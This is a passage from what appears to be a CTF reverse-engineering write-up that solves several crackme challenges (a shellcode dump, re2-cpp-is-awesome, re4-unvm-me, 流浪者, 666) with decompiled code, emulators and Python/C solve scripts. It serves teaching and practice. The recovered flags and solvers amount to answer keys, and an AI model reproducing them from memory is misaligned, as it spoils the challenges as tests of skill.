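                out += mem[regs["rsi"]:regs["rsi"] + regs["rdx"]]
            elif nr == 60:                               # exit(rdi)
                return bytes(out), regs["rdi"]
            else:
                raise ValueError("unhandled syscall %d" % nr)
            pc += 2
        else:
            raise ValueError("unsupported instruction at %#x: %s" % (pc, code[pc:pc + 4].hex()))
    return bytes(out), None


def recover_flag(code=DUMP):
    """Whatever the shellcode writes to stdout, without the trailing newline."""
    out, _status = emulate(code)
    return out.decode("ascii").rstrip("\n")


if __name__ == "__main__":
    out, status = emulate(DUMP)
    print(out.decode("ascii"), end="")
    print("exit status:", status)
```
</pre>
<p>Running it prints <code>flag{poppopret}</code> and exit status 0. Because any unrecognised byte aborts the run with its offset, a transcription error in the dump surfaces as an exception instead of silently producing a truncated flag, which is the check the printable-filter approach lacks.</p></div><div class="highlight-wrap"autocomplete="off" 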
autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">text=[<span class="number">0x68</span>, <span class="number">0x66</span>, <span class="number">0x6C</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>,</span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x61</span>, <span class="number">0x67</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>,</span><br><span class="line"> <span class="number">0x01</span>, <span class="number">0x00</span>, <span 
class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x7B</span>, <span class="number">0x70</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span 
class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>,</span><br><span class="line"> <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x6F</span>, <span class="number">0x70</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>,</span><br><span class="line"> <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span 
class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x70</span>, <span class="number">0x6F</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x70</span>, <span class="number">0x72</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span 
class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>,</span><br><span class="line"> <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x65</span>, <span class="number">0x74</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span 
class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>,</span><br><span class="line"> <span class="number">0x7D</span>, <span class="number">0x0A</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>,</span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span 
class="number">0x48</span>, <span class="number">0x31</span>, <span class="number">0xFF</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x3C</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line">      <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span> ]</span><br><span class="line">t=[]</span><br><span class="line">s=<span class="string">''</span></span><br><span class="line"><span class="comment"># keep only printable ASCII: drops the 0x00 padding and the high opcode bytes (0x8D, 0xB8, 0xBA, 0xBF)</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> text:</span><br><span class="line">    <span class="keyword">if</span> x>=<span class="number">32</span> <span class="keyword">and</span> x<=<span class="number">125</span>:</span><br><span class="line">        t.append(x)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> t:</span><br><span class="line">    s+=chr(i)</span><br><span class="line">print(s)</span><br><span class="line"><span class="comment"># 'HH4$HH' is what survives of the mov/lea/mov/mov instruction bytes between two pushes</span></span><br><span class="line">s=s.replace(<span class="string">'HH4$HH'</span>,<span class="string">''</span>)</span><br><span class="line">print(s)</span><br><span class="line"><span class="comment"># 'h' is the push opcode 0x68 in front of each pair of flag characters</span></span><br><span class="line">s=s.replace(<span class="string">'h'</span>,<span class="string">''</span>)</span><br><span class="line">print(s)</span><br></pre></td></tr></table></figure></div><h3 id="re2-cpp-is-awesome"><a href="#re2-cpp-is-awesome" class="headerlink" title="re2-cpp-is-awesome"></a>re2-cpp-is-awesome</h3><p>A C++ challenge. I wrote source in a similar style when setting the reverse engineering challenges for the freshman competition, so it felt familiar.</p><p>Open it in IDA and look at the main function.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/5FdQxNc41jBKUIo.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Most of the code is irrelevant. Line 27 is a for loop with no termination condition in its header; each iteration advances the iterator with sub_400D7A(&i), i.e. by one character.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" 
autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">_QWORD *__fastcall sub_400D7A(_QWORD *a1)</span><br><span class="line">{</span><br><span class="line">  ++*a1;</span><br><span class="line">  return a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">for ( i = std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::begin(&v11); ; sub_400D7A(&i) )</span><br><span class="line">{</span><br><span class="line">  v13 = std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::end(&v11);</span><br><span class="line">  if ( !sub_400D3D((__int64)&i, (__int64)&v13) )    // loop exit condition: iterator != end</span><br><span class="line">    break;</span><br><span class="line">  v8 = (_BYTE *)sub_400D9A((__int64)&i);             // dereference the iterator: current input character</span><br><span class="line">  if ( *v8 != off_6020A0[dword_6020C0[v14]] )         // key point: a lookup through two nested arrays</span><br><span class="line">    sub_400B56(&i, &v13);</span><br><span class="line">  ++v14;                                             // index into the inner array</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>Comparing sub_400B56(&i, &v13); with sub_400B73(&i, &v13); shows that the flag is in fact hidden in the if condition.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">void __fastcall __noreturn sub_400B56(__int64 a1, __int64 a2, __int64 a3)</span><br><span class="line">{</span><br><span class="line">  std::operator<<<std::char_traits<char>>(&std::cout, "Better luck next time\n", a3);</span><br><span class="line">  exit(0);</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">__int64 __fastcall sub_400B73(__int64 a1, __int64 a2, __int64 a3)</span><br><span class="line">{</span><br><span class="line">  return std::operator<<<std::char_traits<char>>(&std::cout, "You should have the flag by now\n", a3);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>Looking at off_6020A0 and dword_6020C0 we see:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/QHpRUCcTFz9ywOS.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/TP2bDEoU5VOjqwv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>So the loop uses v15/v14 as the index into the inner array dword_6020C0, and the integer it fetches there is in turn the index into the outer array off_6020A0; the characters selected this way form the expected input, i.e. the flag.</p><p><strong>One thing to watch: the <code>align 8</code> after the first dword pads to the next 8-byte boundary, so a zero dword sits between the first two values IDA lists. The inner array therefore really begins 0x24, 0x0, 0x5, ... and that 0x0 must be included.</strong></p><p>The script:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">S = <span class="string">'L3t_ME_T3ll_Y0u_S0m3th1ng_1mp0rtant_A_{FL4G}_W0nt_b3_3X4ctly_th4t_345y_t0_c4ptur3_H0wev3r_1T_w1ll_b3_C00l_'</span></span><br><span class="line"></span><br><span class="line">N = [<span class="number">0x24</span>,<span class="number">0x0</span>,<span class="number">0x5</span>,<span class="number">0x36</span>,<span class="number">0x65</span>,<span class="number">0x7</span>,<span class="number">0x27</span>,<span class="number">0x26</span>,<span class="number">0x2d</span>,<span 
class="number">0x1</span>,<span class="number">0x3</span>,<span class="number">0x0</span>,<span class="number">0x0d</span>,<span class="number">0x56</span>,<span class="number">0x1</span>,<span class="number">0x3</span>,<span class="number">0x65</span>,<span class="number">0x3</span>,<span class="number">0x2d</span>,<span class="number">0x16</span>,<span class="number">0x2</span>,<span class="number">0x15</span>,<span class="number">0x3</span>,<span class="number">0x65</span>,<span class="number">0x0</span>,<span class="number">0x29</span>,<span class="number">0x44</span>,<span class="number">0x44</span>,<span class="number">0x1</span>,<span class="number">0x44</span>,<span class="number">0x2b</span>]</span><br><span class="line"></span><br><span class="line">x = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> N:</span><br><span class="line">    x += S[i]  <span class="comment"># outer table indexed through the inner table, as the binary does</span></span><br><span class="line"></span><br><span class="line">print(x)</span><br></pre></td></tr></table></figure></div><h3 id="re4-unvm-me"><a href="#re4-unvm-me" class="headerlink" title="re4-unvm-me"></a>re4-unvm-me</h3><p>The file is a .pyc; decompiling it with an online pyc decompiler gives:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># visit http://tool.lu/pyc/ for more information</span></span><br><span class="line"><span class="keyword">import</span> md5</span><br><span class="line">md5s = [</span><br><span class="line">    <span class="number">0x831DAA3C843BA8B087C895F0ED305CE7L</span>,</span><br><span class="line">    <span class="number">0x6722F7A07246C6AF20662B855846C2C8L</span>,</span><br><span class="line">    <span 
class="number">0x5F04850FEC81A27AB5FC98BEFA4EB40CL</span>,</span><br><span class="line"> <span class="number">0xECF8DCAC7503E63A6A3667C5FB94F610L</span>,</span><br><span class="line"> <span class="number">0xC0FD15AE2C3931BC1E140523AE934722L</span>,</span><br><span class="line"> <span class="number">0x569F606FD6DA5D612F10CFB95C0BDE6DL</span>,</span><br><span class="line"> <span class="number">0x68CB5A1CF54C078BF0E7E89584C1A4EL</span>,</span><br><span class="line"> <span class="number">0xC11E2CD82D1F9FBD7E4D6EE9581FF3BDL</span>,</span><br><span class="line"> <span class="number">0x1DF4C637D625313720F45706A48FF20FL</span>,</span><br><span class="line"> <span class="number">0x3122EF3A001AAECDB8DD9D843C029E06L</span>,</span><br><span class="line"> <span class="number">0xADB778A0F729293E7E0B19B96A4C5A61L</span>,</span><br><span class="line"> <span class="number">0x938C747C6A051B3E163EB802A325148EL</span>,</span><br><span class="line"> <span class="number">0x38543C5E820DD9403B57BEFF6020596DL</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'Can you turn me back to python ? ...'</span></span><br><span class="line">flag = raw_input(<span class="string">'well as you wish.. 
what is the flag: '</span>)</span><br><span class="line"><span class="keyword">if</span> len(flag) > <span class="number">69</span>:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">if</span> len(flag) % <span class="number">5</span> != <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, len(flag), <span class="number">5</span>):</span><br><span class="line"> s = flag[i:i + <span class="number">5</span>]</span><br><span class="line"> <span class="keyword">if</span> int(<span class="string">'0x'</span> + md5.new(s).hexdigest(), <span class="number">16</span>) != md5s[i / <span class="number">5</span>]:</span><br><span class="line"> <span class="keyword">print</span> <span class="string">'nice try'</span></span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Congratz now you have the flag'</span></span><br></pre></td></tr></table></figure></div><p>Convert the hex values to MD5 digests and look them up directly with an online tool.</p><h3 id="流浪者"><a href="#流浪者" class="headerlink" title="流浪者"></a>流浪者</h3><p>Locate the key function by searching the strings.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/XjDhKBWLoemAa4p.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Use X (cross-references) to find the function that references sub_4017f0.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/9eN7nqHd6LvksVf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Analyze the function:</p><div 
class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; Str[i]; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">57</span> || Str[i] < <span class="number">48</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">122</span> || Str[i] < <span class="number">97</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( Str[i] > <span class="number">90</span> || Str[i] < <span class="number">65</span> )</span><br><span class="line"> sub_4017B0(); // error</span><br><span class="line"> <span class="keyword">else</span> // <span class="number">65</span><span class="number">-90</span> +<span class="number">29</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">29</span>; // uppercase</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> { // <span class="number">97</span><span class="number">-122</span> +<span class="number">87</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">87</span>; // lowercase</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> { // <span class="number">48</span><span class="number">-57</span> +<span class="number">48</span></span><br><span class="line"> v5[i] = Str[i] - <span class="number">48</span>; // digit - '<span class="number">0</span>'</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> 
sub_4017F0(v5);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>Write the solve script:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">tab=<span class="string">'abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ'</span></span><br><span class="line">tg=<span class="string">'KanXueCTF2019JustForhappy'</span></span><br><span class="line">temp=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(tg)):</span><br><span class="line"> temp.append(tab.index(tg[i]))</span><br><span class="line">print(temp)</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> temp:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="number">65</span><span class="number">-29</span> <span class="keyword">and</span> c<=<span class="number">90</span><span class="number">-29</span>:</span><br><span class="line"> c+=<span class="number">29</span></span><br><span class="line"> <span class="keyword">elif</span> c>=<span class="number">97</span><span class="number">-87</span> <span class="keyword">and</span> c<=<span class="number">122</span><span class="number">-87</span>:</span><br><span class="line"> c+=<span class="number">87</span></span><br><span class="line"> <span class="keyword">elif</span> c>=<span class="number">48</span><span class="number">-48</span> <span class="keyword">and</span> c<=<span class="number">57</span><span class="number">-48</span>:</span><br><span class="line"> c+=<span class="number">48</span></span><br><span class="line"> flag+=chr(c)</span><br><span class="line"><span class="keyword">print</span> (flag)</span><br></pre></td></tr></table></figure></div><h3 
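hidden></h3><p>The decompiled loop above maps each input character to a table index (digits to 0-9, lowercase to 10-35, uppercase to 36-61) and, as the solve script assumes, sub_4017F0 then looks each index up in the table and compares the result with KanXueCTF2019JustForhappy. The block below is an added example, not code from the original post: it implements that forward transform and its inverse as a pair, so the recovered input can be confirmed by re-encoding it instead of trusting a one-way decoder. The table and target string are taken from the script above; the function names and the assumption that sub_4017F0 is a plain table lookup are mine.</p>

```python
# Added example (not from the original post): forward transform of the
# decompiled loop, its inverse, and a round-trip check between them.
TAB = 'abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ'  # from the post
TARGET = 'KanXueCTF2019JustForhappy'  # string the binary compares against (from the post)


def char_to_index(ch):
    """Index computation from the decompiled for-loop: '0'-'9' -> 0..9,
    'a'-'z' -> 10..35, 'A'-'Z' -> 36..61.  Anything else makes the binary
    call its error routine (sub_4017B0), so reject it here as well."""
    o = ord(ch)
    if 48 <= o <= 57:
        return o - 48
    if 97 <= o <= 122:
        return o - 87
    if 65 <= o <= 90:
        return o - 29
    raise ValueError(f"{ch!r} is not alphanumeric")


def encode(s):
    """What the binary computes from the input (assumption: sub_4017F0 is a
    plain lookup of each index in TAB)."""
    return ''.join(TAB[char_to_index(c)] for c in s)


def decode(t):
    """Inverse of encode(): table position back to the original character."""
    out = []
    for ch in t:
        idx = TAB.index(ch)            # ValueError if ch is not in the table
        if idx >= 36:
            out.append(chr(idx + 29))  # uppercase range
        elif idx >= 10:
            out.append(chr(idx + 87))  # lowercase range
        else:
            out.append(chr(idx + 48))  # digit range
    return ''.join(out)


def solve():
    """Recover the input and confirm it by re-encoding it."""
    flag = decode(TARGET)
    if encode(flag) != TARGET:
        raise RuntimeError("round trip failed: range boundaries are wrong")
    return flag


if __name__ == '__main__':
    print(solve())
```

<p>The round trip (encode of the decoded result must equal the target) is what catches an off-by-one in the range boundaries; a decoder alone would silently produce a wrong character that the binary would reject.</p><h3 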
id="666"><a href="#666" class="headerlink" title="666"></a>666</h3><p>Not much to explain: load it into IDA and look at main. In main, the user input is stored in v5, and then encode(&v5,&s) is called.</p><p>In the check, it first compares the length of the user input against key, which is 18, and then compares s with enflag. s is what the encode call just produced. enflag is <code>izwhroz""w"v.K".Ni</code></p><p>Here key is 18 and enflag is <code>izwhroz""w"v.K".Ni</code>:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/DFOehNzBxX2aAy6.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Now look at the encode function.<br>a1 is the user input v5 from main, and a2 is s from main, the string that is compared at the end.<br>It first checks that the length of the user input equals key.<br>Then, in a for loop, it takes three characters of the input at a time, applies the corresponding XOR operations to each, and writes the results to the matching positions in a2.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/39EGHuigIXvSpCk.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Write the corresponding script; here it is in both C and Python.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> i;</span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> target[]=<span class="string">"izwhroz\"\"w\"v.K\".Ni"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(i=<span class="number">0</span>;i<<span class="number">18</span>;i+=<span class="number">3</span>){</span><br><span class="line"></span><br><span class="line"> target[i]=(target[i]^<span 
class="number">18</span>)<span class="number">-6</span>;</span><br><span class="line"></span><br><span class="line"> target[i+<span class="number">1</span>]=(target[i+<span class="number">1</span>]^<span class="number">18</span>)+<span class="number">6</span>;</span><br><span class="line"></span><br><span class="line"> target[i+<span class="number">2</span>]=(target[i+<span class="number">2</span>]^<span class="number">18</span>)^<span class="number">6</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(target);</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">enflag=[<span class="number">105</span>, <span class="number">122</span>, <span class="number">119</span>, <span class="number">104</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">122</span>, <span class="number">34</span>, <span class="number">34</span>, <span class="number">119</span>, </span><br><span class="line"> <span class="number">34</span>, <span class="number">118</span>, <span class="number">46</span>, <span class="number">75</span>, <span class="number">34</span>, <span class="number">46</span>, <span class="number">78</span>, <span class="number">105</span>, <span class="number">0</span>]</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">18</span>,<span 
